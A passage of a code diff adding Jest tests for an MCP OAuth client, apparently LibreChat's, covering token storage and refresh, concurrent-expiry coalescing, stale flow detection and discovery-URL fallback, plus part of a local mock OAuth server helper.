id: 1,
params: {
protocolVersion: '2025-03-26',
capabilities: {},
clientInfo: { name: 'test', version: '0.0.1' },
},
}),
});
expect(finalMcpRes.status).toBe(200);
});
});
describe('Concurrent token expiry with connection mutex', () => {
it('should handle multiple concurrent getTokens calls when token is expired', async () => {
const tokenStore = new InMemoryTokenStore();
await tokenStore.createToken({
userId: 'u1',
type: 'mcp_oauth',
identifier: 'mcp:test-srv',
token: 'enc:expired-token',
expiresIn: -1,
});
await tokenStore.createToken({
userId: 'u1',
type: 'mcp_oauth_refresh',
identifier: 'mcp:test-srv:refresh',
token: 'enc:valid-refresh',
expiresIn: 86400,
});
let refreshCallCount = 0;
const refreshCallback = jest.fn().mockImplementation(async () => {
refreshCallCount++;
await new Promise((r) => setTimeout(r, 100));
return {
access_token: `refreshed-token-${refreshCallCount}`,
token_type: 'Bearer',
expires_in: 3600,
obtained_at: Date.now(),
expires_at: Date.now() + 3600000,
};
});
// Fire 3 concurrent getTokens calls via FlowStateManager (like the connection mutex does)
const flowStore = new MockKeyv<MCPOAuthTokens | null>();
const flowManager = new FlowStateManager(flowStore as unknown as Keyv, {
ttl: 30000,
ci: true,
});
const getTokensViaFlow = () =>
flowManager.createFlowWithHandler('u1:test-srv', 'mcp_get_tokens', async () => {
return await MCPTokenStorage.getTokens({
userId: 'u1',
serverName: 'test-srv',
findToken: tokenStore.findToken,
createToken: tokenStore.createToken,
updateToken: tokenStore.updateToken,
refreshTokens: refreshCallback,
});
});
const [r1, r2, r3] = await Promise.all([
getTokensViaFlow(),
getTokensViaFlow(),
getTokensViaFlow(),
]);
// All should get tokens (either directly or via flow coalescing)
expect(r1).not.toBeNull();
expect(r2).not.toBeNull();
expect(r3).not.toBeNull();
// The refresh callback should only be called once due to flow coalescing
expect(refreshCallback).toHaveBeenCalledTimes(1);
});
});
describe('Stale PENDING flow detection', () => {
it('should treat PENDING flows older than 2 minutes as stale', async () => {
const flowStore = new MockKeyv<MCPOAuthTokens | null>();
const flowManager = new FlowStateManager(flowStore as unknown as Keyv, {
ttl: 300000,
ci: true,
});
const flowId = 'user1:test-server';
await flowManager.initFlow(flowId, 'mcp_oauth', {
serverName: 'test-server',
authorizationUrl: 'https://example.com/auth',
});
// Manually age the flow to 3 minutes
const state = await flowManager.getFlowState(flowId, 'mcp_oauth');
if (state) {
state.createdAt = Date.now() - 3 * 60 * 1000;
await (flowStore as unknown as { set: (k: string, v: unknown) => Promise<void> }).set(
`mcp_oauth:${flowId}`,
state,
);
}
const agedState = await flowManager.getFlowState(flowId, 'mcp_oauth');
expect(agedState?.status).toBe('PENDING');
const age = agedState?.createdAt ? Date.now() - agedState.createdAt : 0;
expect(age).toBeGreaterThan(2 * 60 * 1000);
// A new flow should be created (the stale one would be deleted + recreated)
// This verifies our staleness check threshold
expect(age > PENDING_STALE_MS).toBe(true);
});
it('should not treat recent PENDING flows as stale', async () => {
const flowStore = new MockKeyv<MCPOAuthTokens | null>();
const flowManager = new FlowStateManager(flowStore as unknown as Keyv, {
ttl: 300000,
ci: true,
});
const flowId = 'user1:test-server';
await flowManager.initFlow(flowId, 'mcp_oauth', {
serverName: 'test-server',
authorizationUrl: 'https://example.com/auth',
});
const state = await flowManager.getFlowState(flowId, 'mcp_oauth');
const age = state?.createdAt ? Date.now() - state.createdAt : Infinity;
expect(age < PENDING_STALE_MS).toBe(true);
});
});
});


@@ -0,0 +1,544 @@
/**
* Integration tests for MCPTokenStorage.storeTokens() and MCPTokenStorage.getTokens().
*
* Uses InMemoryTokenStore to exercise encrypt/decrypt round-trips, expiry calculation,
* refresh callback wiring, and ReauthenticationRequiredError paths.
*/
import { MCPTokenStorage, ReauthenticationRequiredError } from '~/mcp/oauth';
import { InMemoryTokenStore } from './helpers/oauthTestServer';
jest.mock('@librechat/data-schemas', () => ({
logger: {
info: jest.fn(),
warn: jest.fn(),
error: jest.fn(),
debug: jest.fn(),
},
encryptV2: jest.fn(async (val: string) => `enc:${val}`),
decryptV2: jest.fn(async (val: string) => val.replace(/^enc:/, '')),
}));
describe('MCPTokenStorage', () => {
let store: InMemoryTokenStore;
beforeEach(() => {
store = new InMemoryTokenStore();
jest.clearAllMocks();
});
describe('storeTokens', () => {
it('should create new access token with expires_in', async () => {
await MCPTokenStorage.storeTokens({
userId: 'u1',
serverName: 'srv1',
tokens: { access_token: 'at1', token_type: 'Bearer', expires_in: 3600 },
createToken: store.createToken,
});
const saved = await store.findToken({
userId: 'u1',
type: 'mcp_oauth',
identifier: 'mcp:srv1',
});
expect(saved).not.toBeNull();
expect(saved!.token).toBe('enc:at1');
const expiresInMs = saved!.expiresAt.getTime() - Date.now();
expect(expiresInMs).toBeGreaterThan(3500 * 1000);
expect(expiresInMs).toBeLessThanOrEqual(3600 * 1000);
});
it('should create new access token with expires_at (MCPOAuthTokens format)', async () => {
const expiresAt = Date.now() + 7200 * 1000;
await MCPTokenStorage.storeTokens({
userId: 'u1',
serverName: 'srv1',
tokens: {
access_token: 'at1',
token_type: 'Bearer',
expires_at: expiresAt,
obtained_at: Date.now(),
},
createToken: store.createToken,
});
const saved = await store.findToken({
userId: 'u1',
type: 'mcp_oauth',
identifier: 'mcp:srv1',
});
expect(saved).not.toBeNull();
const diff = Math.abs(saved!.expiresAt.getTime() - expiresAt);
expect(diff).toBeLessThan(2000);
});
it('should default to 1-year expiry when none provided', async () => {
await MCPTokenStorage.storeTokens({
userId: 'u1',
serverName: 'srv1',
tokens: { access_token: 'at1', token_type: 'Bearer' },
createToken: store.createToken,
});
const saved = await store.findToken({
userId: 'u1',
type: 'mcp_oauth',
identifier: 'mcp:srv1',
});
const oneYearMs = 365 * 24 * 60 * 60 * 1000;
const expiresInMs = saved!.expiresAt.getTime() - Date.now();
expect(expiresInMs).toBeGreaterThan(oneYearMs - 5000);
});
it('should update existing access token', async () => {
await store.createToken({
userId: 'u1',
type: 'mcp_oauth',
identifier: 'mcp:srv1',
token: 'enc:old-token',
expiresIn: 3600,
});
await MCPTokenStorage.storeTokens({
userId: 'u1',
serverName: 'srv1',
tokens: { access_token: 'new-token', token_type: 'Bearer', expires_in: 7200 },
createToken: store.createToken,
updateToken: store.updateToken,
findToken: store.findToken,
});
const saved = await store.findToken({
userId: 'u1',
type: 'mcp_oauth',
identifier: 'mcp:srv1',
});
expect(saved!.token).toBe('enc:new-token');
});
it('should store refresh token alongside access token', async () => {
await MCPTokenStorage.storeTokens({
userId: 'u1',
serverName: 'srv1',
tokens: {
access_token: 'at1',
token_type: 'Bearer',
expires_in: 3600,
refresh_token: 'rt1',
},
createToken: store.createToken,
});
const refreshSaved = await store.findToken({
userId: 'u1',
type: 'mcp_oauth_refresh',
identifier: 'mcp:srv1:refresh',
});
expect(refreshSaved).not.toBeNull();
expect(refreshSaved!.token).toBe('enc:rt1');
});
it('should skip refresh token when not in response', async () => {
await MCPTokenStorage.storeTokens({
userId: 'u1',
serverName: 'srv1',
tokens: { access_token: 'at1', token_type: 'Bearer', expires_in: 3600 },
createToken: store.createToken,
});
const refreshSaved = await store.findToken({
userId: 'u1',
type: 'mcp_oauth_refresh',
identifier: 'mcp:srv1:refresh',
});
expect(refreshSaved).toBeNull();
});
it('should store client info when provided', async () => {
await MCPTokenStorage.storeTokens({
userId: 'u1',
serverName: 'srv1',
tokens: { access_token: 'at1', token_type: 'Bearer', expires_in: 3600 },
createToken: store.createToken,
clientInfo: { client_id: 'cid', client_secret: 'csec', redirect_uris: [] },
});
const clientSaved = await store.findToken({
userId: 'u1',
type: 'mcp_oauth_client',
identifier: 'mcp:srv1:client',
});
expect(clientSaved).not.toBeNull();
expect(clientSaved!.token).toContain('enc:');
expect(clientSaved!.token).toContain('cid');
});
it('should use existingTokens to skip DB lookups', async () => {
const findSpy = jest.fn();
await MCPTokenStorage.storeTokens({
userId: 'u1',
serverName: 'srv1',
tokens: { access_token: 'at1', token_type: 'Bearer', expires_in: 3600 },
createToken: store.createToken,
updateToken: store.updateToken,
findToken: findSpy,
existingTokens: {
accessToken: null,
refreshToken: null,
clientInfoToken: null,
},
});
expect(findSpy).not.toHaveBeenCalled();
});
it('should handle invalid NaN expiry date', async () => {
await MCPTokenStorage.storeTokens({
userId: 'u1',
serverName: 'srv1',
tokens: {
access_token: 'at1',
token_type: 'Bearer',
expires_at: NaN,
obtained_at: Date.now(),
},
createToken: store.createToken,
});
const saved = await store.findToken({
userId: 'u1',
type: 'mcp_oauth',
identifier: 'mcp:srv1',
});
expect(saved).not.toBeNull();
const oneYearMs = 365 * 24 * 60 * 60 * 1000;
const expiresInMs = saved!.expiresAt.getTime() - Date.now();
expect(expiresInMs).toBeGreaterThan(oneYearMs - 5000);
});
});
describe('getTokens', () => {
it('should return valid non-expired tokens', async () => {
await store.createToken({
userId: 'u1',
type: 'mcp_oauth',
identifier: 'mcp:srv1',
token: 'enc:valid-token',
expiresIn: 3600,
});
const result = await MCPTokenStorage.getTokens({
userId: 'u1',
serverName: 'srv1',
findToken: store.findToken,
});
expect(result).not.toBeNull();
expect(result!.access_token).toBe('valid-token');
expect(result!.token_type).toBe('Bearer');
});
it('should return tokens with refresh token when available', async () => {
await store.createToken({
userId: 'u1',
type: 'mcp_oauth',
identifier: 'mcp:srv1',
token: 'enc:at',
expiresIn: 3600,
});
await store.createToken({
userId: 'u1',
type: 'mcp_oauth_refresh',
identifier: 'mcp:srv1:refresh',
token: 'enc:rt',
expiresIn: 86400,
});
const result = await MCPTokenStorage.getTokens({
userId: 'u1',
serverName: 'srv1',
findToken: store.findToken,
});
expect(result!.refresh_token).toBe('rt');
});
it('should return tokens without refresh token field when none stored', async () => {
await store.createToken({
userId: 'u1',
type: 'mcp_oauth',
identifier: 'mcp:srv1',
token: 'enc:at',
expiresIn: 3600,
});
const result = await MCPTokenStorage.getTokens({
userId: 'u1',
serverName: 'srv1',
findToken: store.findToken,
});
expect(result!.refresh_token).toBeUndefined();
});
it('should throw ReauthenticationRequiredError when expired and no refresh', async () => {
await store.createToken({
userId: 'u1',
type: 'mcp_oauth',
identifier: 'mcp:srv1',
token: 'enc:expired-token',
expiresIn: -1,
});
await expect(
MCPTokenStorage.getTokens({
userId: 'u1',
serverName: 'srv1',
findToken: store.findToken,
}),
).rejects.toThrow(ReauthenticationRequiredError);
});
it('should throw ReauthenticationRequiredError when missing and no refresh', async () => {
await expect(
MCPTokenStorage.getTokens({
userId: 'u1',
serverName: 'srv1',
findToken: store.findToken,
}),
).rejects.toThrow(ReauthenticationRequiredError);
});
it('should refresh expired access token when refresh token and callback are available', async () => {
await store.createToken({
userId: 'u1',
type: 'mcp_oauth',
identifier: 'mcp:srv1',
token: 'enc:expired-token',
expiresIn: -1,
});
await store.createToken({
userId: 'u1',
type: 'mcp_oauth_refresh',
identifier: 'mcp:srv1:refresh',
token: 'enc:rt',
expiresIn: 86400,
});
const refreshTokens = jest.fn().mockResolvedValue({
access_token: 'refreshed-at',
token_type: 'Bearer',
expires_in: 3600,
obtained_at: Date.now(),
expires_at: Date.now() + 3600000,
});
const result = await MCPTokenStorage.getTokens({
userId: 'u1',
serverName: 'srv1',
findToken: store.findToken,
createToken: store.createToken,
updateToken: store.updateToken,
refreshTokens,
});
expect(result).not.toBeNull();
expect(result!.access_token).toBe('refreshed-at');
expect(refreshTokens).toHaveBeenCalledWith(
'rt',
expect.objectContaining({ userId: 'u1', serverName: 'srv1' }),
);
});
it('should return null when refresh fails', async () => {
await store.createToken({
userId: 'u1',
type: 'mcp_oauth',
identifier: 'mcp:srv1',
token: 'enc:expired-token',
expiresIn: -1,
});
await store.createToken({
userId: 'u1',
type: 'mcp_oauth_refresh',
identifier: 'mcp:srv1:refresh',
token: 'enc:rt',
expiresIn: 86400,
});
const refreshTokens = jest.fn().mockRejectedValue(new Error('refresh failed'));
const result = await MCPTokenStorage.getTokens({
userId: 'u1',
serverName: 'srv1',
findToken: store.findToken,
createToken: store.createToken,
updateToken: store.updateToken,
refreshTokens,
});
expect(result).toBeNull();
});
it('should return null when no refreshTokens callback provided', async () => {
await store.createToken({
userId: 'u1',
type: 'mcp_oauth',
identifier: 'mcp:srv1',
token: 'enc:expired-token',
expiresIn: -1,
});
await store.createToken({
userId: 'u1',
type: 'mcp_oauth_refresh',
identifier: 'mcp:srv1:refresh',
token: 'enc:rt',
expiresIn: 86400,
});
const result = await MCPTokenStorage.getTokens({
userId: 'u1',
serverName: 'srv1',
findToken: store.findToken,
});
expect(result).toBeNull();
});
it('should return null when no createToken callback provided', async () => {
await store.createToken({
userId: 'u1',
type: 'mcp_oauth',
identifier: 'mcp:srv1',
token: 'enc:expired-token',
expiresIn: -1,
});
await store.createToken({
userId: 'u1',
type: 'mcp_oauth_refresh',
identifier: 'mcp:srv1:refresh',
token: 'enc:rt',
expiresIn: 86400,
});
const result = await MCPTokenStorage.getTokens({
userId: 'u1',
serverName: 'srv1',
findToken: store.findToken,
refreshTokens: jest.fn(),
});
expect(result).toBeNull();
});
it('should pass client info to refreshTokens metadata', async () => {
await store.createToken({
userId: 'u1',
type: 'mcp_oauth',
identifier: 'mcp:srv1',
token: 'enc:expired-token',
expiresIn: -1,
});
await store.createToken({
userId: 'u1',
type: 'mcp_oauth_refresh',
identifier: 'mcp:srv1:refresh',
token: 'enc:rt',
expiresIn: 86400,
});
await store.createToken({
userId: 'u1',
type: 'mcp_oauth_client',
identifier: 'mcp:srv1:client',
token: 'enc:{"client_id":"cid","client_secret":"csec"}',
expiresIn: 86400,
});
const refreshTokens = jest.fn().mockResolvedValue({
access_token: 'new-at',
token_type: 'Bearer',
expires_in: 3600,
});
await MCPTokenStorage.getTokens({
userId: 'u1',
serverName: 'srv1',
findToken: store.findToken,
createToken: store.createToken,
updateToken: store.updateToken,
refreshTokens,
});
expect(refreshTokens).toHaveBeenCalledWith(
'rt',
expect.objectContaining({
clientInfo: expect.objectContaining({ client_id: 'cid' }),
}),
);
});
it('should handle unauthorized_client refresh error', async () => {
const { logger } = await import('@librechat/data-schemas');
await store.createToken({
userId: 'u1',
type: 'mcp_oauth',
identifier: 'mcp:srv1',
token: 'enc:expired-token',
expiresIn: -1,
});
await store.createToken({
userId: 'u1',
type: 'mcp_oauth_refresh',
identifier: 'mcp:srv1:refresh',
token: 'enc:rt',
expiresIn: 86400,
});
const refreshTokens = jest.fn().mockRejectedValue(new Error('unauthorized_client'));
const result = await MCPTokenStorage.getTokens({
userId: 'u1',
serverName: 'srv1',
findToken: store.findToken,
createToken: store.createToken,
refreshTokens,
});
expect(result).toBeNull();
expect(logger.info).toHaveBeenCalledWith(
expect.stringContaining('does not support refresh tokens'),
);
});
});
describe('storeTokens + getTokens round-trip', () => {
it('should store and retrieve tokens with full encrypt/decrypt cycle', async () => {
await MCPTokenStorage.storeTokens({
userId: 'u1',
serverName: 'srv1',
tokens: {
access_token: 'my-access-token',
token_type: 'Bearer',
expires_in: 3600,
refresh_token: 'my-refresh-token',
},
createToken: store.createToken,
clientInfo: { client_id: 'cid', client_secret: 'sec', redirect_uris: [] },
});
const result = await MCPTokenStorage.getTokens({
userId: 'u1',
serverName: 'srv1',
findToken: store.findToken,
});
expect(result!.access_token).toBe('my-access-token');
expect(result!.refresh_token).toBe('my-refresh-token');
expect(result!.token_type).toBe('Bearer');
expect(result!.obtained_at).toBeDefined();
expect(result!.expires_at).toBeDefined();
});
});
});


@@ -1439,5 +1439,292 @@ describe('MCPOAuthHandler - Configurable OAuth Metadata', () => {
}),
);
});
describe('path-based URL origin fallback', () => {
it('retries with origin URL when path-based discovery fails (stored clientInfo path)', async () => {
const metadata = {
serverName: 'sentry',
serverUrl: 'https://mcp.sentry.dev/mcp',
clientInfo: {
client_id: 'test-client-id',
client_secret: 'test-client-secret',
grant_types: ['authorization_code', 'refresh_token'],
},
};
const originMetadata = {
issuer: 'https://mcp.sentry.dev/',
authorization_endpoint: 'https://mcp.sentry.dev/oauth/authorize',
token_endpoint: 'https://mcp.sentry.dev/oauth/token',
token_endpoint_auth_methods_supported: ['client_secret_post'],
response_types_supported: ['code'],
jwks_uri: 'https://mcp.sentry.dev/.well-known/jwks.json',
subject_types_supported: ['public'],
id_token_signing_alg_values_supported: ['RS256'],
} as AuthorizationServerMetadata;
// First call (path-based URL) fails, second call (origin URL) succeeds
mockDiscoverAuthorizationServerMetadata
.mockResolvedValueOnce(undefined)
.mockResolvedValueOnce(originMetadata);
mockFetch.mockResolvedValueOnce({
ok: true,
json: async () => ({
access_token: 'new-access-token',
refresh_token: 'new-refresh-token',
expires_in: 3600,
}),
} as Response);
const result = await MCPOAuthHandler.refreshOAuthTokens(
'test-refresh-token',
metadata,
{},
{},
);
// Discovery attempted twice: once with path URL, once with origin URL
expect(mockDiscoverAuthorizationServerMetadata).toHaveBeenCalledTimes(2);
expect(mockDiscoverAuthorizationServerMetadata).toHaveBeenNthCalledWith(
1,
expect.any(URL),
expect.any(Object),
);
expect(mockDiscoverAuthorizationServerMetadata).toHaveBeenNthCalledWith(
2,
expect.any(URL),
expect.any(Object),
);
const firstDiscoveryUrl = mockDiscoverAuthorizationServerMetadata.mock.calls[0][0] as URL;
const secondDiscoveryUrl = mockDiscoverAuthorizationServerMetadata.mock.calls[1][0] as URL;
expect(firstDiscoveryUrl.href).toBe('https://mcp.sentry.dev/mcp');
expect(secondDiscoveryUrl.href).toBe('https://mcp.sentry.dev/');
// Token endpoint from origin discovery metadata is used (string in stored-clientInfo branch)
expect(mockFetch).toHaveBeenCalled();
const [fetchUrl, fetchOptions] = mockFetch.mock.calls[0];
expect(typeof fetchUrl).toBe('string');
expect(fetchUrl).toBe('https://mcp.sentry.dev/oauth/token');
expect(fetchOptions).toEqual(expect.objectContaining({ method: 'POST' }));
expect(result.access_token).toBe('new-access-token');
});
it('retries with origin URL when path-based discovery fails (no stored clientInfo)', async () => {
// No clientInfo — uses the auto-discovered branch
const metadata = {
serverName: 'sentry',
serverUrl: 'https://mcp.sentry.dev/mcp',
};
const originMetadata = {
issuer: 'https://mcp.sentry.dev/',
authorization_endpoint: 'https://mcp.sentry.dev/oauth/authorize',
token_endpoint: 'https://mcp.sentry.dev/oauth/token',
response_types_supported: ['code'],
jwks_uri: 'https://mcp.sentry.dev/.well-known/jwks.json',
subject_types_supported: ['public'],
id_token_signing_alg_values_supported: ['RS256'],
} as AuthorizationServerMetadata;
// First call (path-based URL) fails, second call (origin URL) succeeds
mockDiscoverAuthorizationServerMetadata
.mockResolvedValueOnce(undefined)
.mockResolvedValueOnce(originMetadata);
mockFetch.mockResolvedValueOnce({
ok: true,
json: async () => ({
access_token: 'new-access-token',
refresh_token: 'new-refresh-token',
expires_in: 3600,
}),
} as Response);
const result = await MCPOAuthHandler.refreshOAuthTokens(
'test-refresh-token',
metadata,
{},
{},
);
// Discovery attempted twice: once with path URL, once with origin URL
expect(mockDiscoverAuthorizationServerMetadata).toHaveBeenCalledTimes(2);
expect(mockDiscoverAuthorizationServerMetadata).toHaveBeenNthCalledWith(
1,
expect.any(URL),
expect.any(Object),
);
expect(mockDiscoverAuthorizationServerMetadata).toHaveBeenNthCalledWith(
2,
expect.any(URL),
expect.any(Object),
);
const firstDiscoveryUrl = mockDiscoverAuthorizationServerMetadata.mock.calls[0][0] as URL;
const secondDiscoveryUrl = mockDiscoverAuthorizationServerMetadata.mock.calls[1][0] as URL;
expect(firstDiscoveryUrl.href).toBe('https://mcp.sentry.dev/mcp');
expect(secondDiscoveryUrl.href).toBe('https://mcp.sentry.dev/');
// Token endpoint from origin discovery metadata is used (URL object in auto-discovered branch)
expect(mockFetch).toHaveBeenCalled();
const [fetchUrl, fetchOptions] = mockFetch.mock.calls[0];
expect(fetchUrl).toBeInstanceOf(URL);
expect(fetchUrl.toString()).toBe('https://mcp.sentry.dev/oauth/token');
expect(fetchOptions).toEqual(expect.objectContaining({ method: 'POST' }));
expect(result.access_token).toBe('new-access-token');
});
it('falls back to /token when both path and origin discovery fail', async () => {
const metadata = {
serverName: 'sentry',
serverUrl: 'https://mcp.sentry.dev/mcp',
clientInfo: {
client_id: 'test-client-id',
client_secret: 'test-client-secret',
grant_types: ['authorization_code', 'refresh_token'],
},
};
// Both path AND origin discovery return undefined
mockDiscoverAuthorizationServerMetadata
.mockResolvedValueOnce(undefined)
.mockResolvedValueOnce(undefined);
mockFetch.mockResolvedValueOnce({
ok: true,
json: async () => ({
access_token: 'new-access-token',
refresh_token: 'new-refresh-token',
expires_in: 3600,
}),
} as Response);
const result = await MCPOAuthHandler.refreshOAuthTokens(
'test-refresh-token',
metadata,
{},
{},
);
expect(mockDiscoverAuthorizationServerMetadata).toHaveBeenCalledTimes(2);
// Falls back to /token relative to server URL origin
const [fetchUrl] = mockFetch.mock.calls[0];
expect(String(fetchUrl)).toBe('https://mcp.sentry.dev/token');
expect(result.access_token).toBe('new-access-token');
});
it('does not retry with origin when server URL has no path (root URL)', async () => {
const metadata = {
serverName: 'test-server',
serverUrl: 'https://auth.example.com/',
clientInfo: {
client_id: 'test-client-id',
client_secret: 'test-client-secret',
},
};
// Root URL discovery fails — no retry
mockDiscoverAuthorizationServerMetadata.mockResolvedValueOnce(undefined);
mockFetch.mockResolvedValueOnce({
ok: true,
json: async () => ({ access_token: 'new-token', expires_in: 3600 }),
} as Response);
await MCPOAuthHandler.refreshOAuthTokens('test-refresh-token', metadata, {}, {});
// Only one discovery attempt for a root URL
expect(mockDiscoverAuthorizationServerMetadata).toHaveBeenCalledTimes(1);
});
it('retries with origin when path-based discovery throws', async () => {
const metadata = {
serverName: 'sentry',
serverUrl: 'https://mcp.sentry.dev/mcp',
clientInfo: {
client_id: 'test-client-id',
client_secret: 'test-client-secret',
grant_types: ['authorization_code', 'refresh_token'],
},
};
const originMetadata = {
issuer: 'https://mcp.sentry.dev/',
authorization_endpoint: 'https://mcp.sentry.dev/oauth/authorize',
token_endpoint: 'https://mcp.sentry.dev/oauth/token',
token_endpoint_auth_methods_supported: ['client_secret_post'],
response_types_supported: ['code'],
} as AuthorizationServerMetadata;
// First call throws, second call succeeds
mockDiscoverAuthorizationServerMetadata
.mockRejectedValueOnce(new Error('Network error'))
.mockResolvedValueOnce(originMetadata);
mockFetch.mockResolvedValueOnce({
ok: true,
json: async () => ({
access_token: 'new-access-token',
refresh_token: 'new-refresh-token',
expires_in: 3600,
}),
} as Response);
const result = await MCPOAuthHandler.refreshOAuthTokens(
'test-refresh-token',
metadata,
{},
{},
);
expect(mockDiscoverAuthorizationServerMetadata).toHaveBeenCalledTimes(2);
const [fetchUrl] = mockFetch.mock.calls[0];
expect(String(fetchUrl)).toBe('https://mcp.sentry.dev/oauth/token');
expect(result.access_token).toBe('new-access-token');
});
it('propagates the throw when root URL discovery throws', async () => {
const metadata = {
serverName: 'test-server',
serverUrl: 'https://auth.example.com/',
clientInfo: {
client_id: 'test-client-id',
client_secret: 'test-client-secret',
},
};
mockDiscoverAuthorizationServerMetadata.mockRejectedValueOnce(
new Error('Discovery failed'),
);
await expect(
MCPOAuthHandler.refreshOAuthTokens('test-refresh-token', metadata, {}, {}),
).rejects.toThrow('Discovery failed');
expect(mockDiscoverAuthorizationServerMetadata).toHaveBeenCalledTimes(1);
});
it('propagates the throw when both path and origin discovery throw', async () => {
const metadata = {
serverName: 'sentry',
serverUrl: 'https://mcp.sentry.dev/mcp',
clientInfo: {
client_id: 'test-client-id',
client_secret: 'test-client-secret',
},
};
mockDiscoverAuthorizationServerMetadata
.mockRejectedValueOnce(new Error('Network error'))
.mockRejectedValueOnce(new Error('Origin also failed'));
await expect(
MCPOAuthHandler.refreshOAuthTokens('test-refresh-token', metadata, {}, {}),
).rejects.toThrow('Origin also failed');
expect(mockDiscoverAuthorizationServerMetadata).toHaveBeenCalledTimes(2);
});
});
});
});


@@ -0,0 +1,449 @@
import * as http from 'http';
import * as net from 'net';
import { randomUUID, createHash } from 'crypto';
import { z } from 'zod';
import { McpServer } from '@modelcontextprotocol/sdk/server/mcp.js';
import { StreamableHTTPServerTransport } from '@modelcontextprotocol/sdk/server/streamableHttp.js';
import type { FlowState } from '~/flow/types';
import type { Socket } from 'net';
export class MockKeyv<T = unknown> {
private store: Map<string, FlowState<T>>;
constructor() {
this.store = new Map();
}
async get(key: string): Promise<FlowState<T> | undefined> {
return this.store.get(key);
}
async set(key: string, value: FlowState<T>, _ttl?: number): Promise<true> {
this.store.set(key, value);
return true;
}
async delete(key: string): Promise<boolean> {
return this.store.delete(key);
}
}
export function getFreePort(): Promise<number> {
return new Promise((resolve, reject) => {
const srv = net.createServer();
srv.listen(0, '127.0.0.1', () => {
const addr = srv.address() as net.AddressInfo;
srv.close((err) => (err ? reject(err) : resolve(addr.port)));
});
});
}
export function trackSockets(httpServer: http.Server): () => Promise<void> {
const sockets = new Set<Socket>();
httpServer.on('connection', (socket: Socket) => {
sockets.add(socket);
socket.once('close', () => sockets.delete(socket));
});
return () =>
new Promise<void>((resolve) => {
for (const socket of sockets) {
socket.destroy();
}
sockets.clear();
httpServer.close(() => resolve());
});
}
export interface OAuthTestServerOptions {
tokenTTLMs?: number;
issueRefreshTokens?: boolean;
refreshTokenTTLMs?: number;
rotateRefreshTokens?: boolean;
}
export interface OAuthTestServer {
url: string;
port: number;
close: () => Promise<void>;
issuedTokens: Set<string>;
tokenTTL: number;
tokenIssueTimes: Map<string, number>;
issuedRefreshTokens: Map<string, string>;
registeredClients: Map<string, { client_id: string; client_secret: string }>;
getAuthCode: () => Promise<string>;
}
async function readRequestBody(req: http.IncomingMessage): Promise<string> {
const chunks: Uint8Array[] = [];
for await (const chunk of req) {
chunks.push(chunk as Uint8Array);
}
return Buffer.concat(chunks).toString();
}
function parseTokenRequest(body: string, contentType: string | undefined): URLSearchParams | null {
if (contentType?.includes('application/x-www-form-urlencoded')) {
return new URLSearchParams(body);
}
if (contentType?.includes('application/json')) {
const json = JSON.parse(body) as Record<string, string>;
return new URLSearchParams(json);
}
return new URLSearchParams(body);
}
export async function createOAuthMCPServer(
options: OAuthTestServerOptions = {},
): Promise<OAuthTestServer> {
const {
tokenTTLMs = 60000,
issueRefreshTokens = false,
refreshTokenTTLMs = 365 * 24 * 60 * 60 * 1000,
rotateRefreshTokens = false,
} = options;
const sessions = new Map<string, StreamableHTTPServerTransport>();
const issuedTokens = new Set<string>();
const tokenIssueTimes = new Map<string, number>();
const issuedRefreshTokens = new Map<string, string>();
const refreshTokenIssueTimes = new Map<string, number>();
const authCodes = new Map<string, { codeChallenge?: string; codeChallengeMethod?: string }>();
const registeredClients = new Map<string, { client_id: string; client_secret: string }>();
let port = 0;
const httpServer = http.createServer(async (req, res) => {
const url = new URL(req.url ?? '/', `http://${req.headers.host}`);
if (url.pathname === '/.well-known/oauth-authorization-server' && req.method === 'GET') {
res.writeHead(200, { 'Content-Type': 'application/json' });
res.end(
JSON.stringify({
issuer: `http://127.0.0.1:${port}`,
authorization_endpoint: `http://127.0.0.1:${port}/authorize`,
token_endpoint: `http://127.0.0.1:${port}/token`,
registration_endpoint: `http://127.0.0.1:${port}/register`,
response_types_supported: ['code'],
grant_types_supported: issueRefreshTokens
? ['authorization_code', 'refresh_token']
: ['authorization_code'],
token_endpoint_auth_methods_supported: ['client_secret_basic', 'client_secret_post'],
code_challenge_methods_supported: ['S256'],
}),
);
return;
}
if (url.pathname === '/register' && req.method === 'POST') {
const body = await readRequestBody(req);
const data = JSON.parse(body) as { redirect_uris?: string[] };
const clientId = `client-${randomUUID().slice(0, 8)}`;
const clientSecret = `secret-${randomUUID()}`;
registeredClients.set(clientId, { client_id: clientId, client_secret: clientSecret });
res.writeHead(200, { 'Content-Type': 'application/json' });
res.end(
JSON.stringify({
client_id: clientId,
client_secret: clientSecret,
redirect_uris: data.redirect_uris ?? [],
}),
);
return;
}
if (url.pathname === '/authorize') {
const code = randomUUID();
const codeChallenge = url.searchParams.get('code_challenge') ?? undefined;
const codeChallengeMethod = url.searchParams.get('code_challenge_method') ?? undefined;
authCodes.set(code, { codeChallenge, codeChallengeMethod });
const redirectUri = url.searchParams.get('redirect_uri') ?? '';
const state = url.searchParams.get('state') ?? '';
res.writeHead(302, {
Location: `${redirectUri}?code=${code}&state=${state}`,
});
res.end();
return;
}
if (url.pathname === '/token' && req.method === 'POST') {
const body = await readRequestBody(req);
const params = parseTokenRequest(body, req.headers['content-type']);
if (!params) {
res.writeHead(400, { 'Content-Type': 'application/json' });
res.end(JSON.stringify({ error: 'invalid_request' }));
return;
}
const grantType = params.get('grant_type');
if (grantType === 'authorization_code') {
const code = params.get('code');
const codeData = code ? authCodes.get(code) : undefined;
if (!code || !codeData) {
res.writeHead(400, { 'Content-Type': 'application/json' });
res.end(JSON.stringify({ error: 'invalid_grant' }));
return;
}
if (codeData.codeChallenge) {
const codeVerifier = params.get('code_verifier');
if (!codeVerifier) {
res.writeHead(400, { 'Content-Type': 'application/json' });
res.end(JSON.stringify({ error: 'invalid_grant' }));
return;
}
if (codeData.codeChallengeMethod === 'S256') {
const expected = createHash('sha256').update(codeVerifier).digest('base64url');
if (expected !== codeData.codeChallenge) {
res.writeHead(400, { 'Content-Type': 'application/json' });
res.end(JSON.stringify({ error: 'invalid_grant' }));
return;
}
}
}
authCodes.delete(code);
const accessToken = randomUUID();
issuedTokens.add(accessToken);
tokenIssueTimes.set(accessToken, Date.now());
const tokenResponse: Record<string, string | number> = {
access_token: accessToken,
token_type: 'Bearer',
expires_in: Math.ceil(tokenTTLMs / 1000),
};
if (issueRefreshTokens) {
const refreshToken = randomUUID();
issuedRefreshTokens.set(refreshToken, accessToken);
refreshTokenIssueTimes.set(refreshToken, Date.now());
tokenResponse.refresh_token = refreshToken;
}
res.writeHead(200, { 'Content-Type': 'application/json' });
res.end(JSON.stringify(tokenResponse));
return;
}
if (grantType === 'refresh_token' && issueRefreshTokens) {
const refreshToken = params.get('refresh_token');
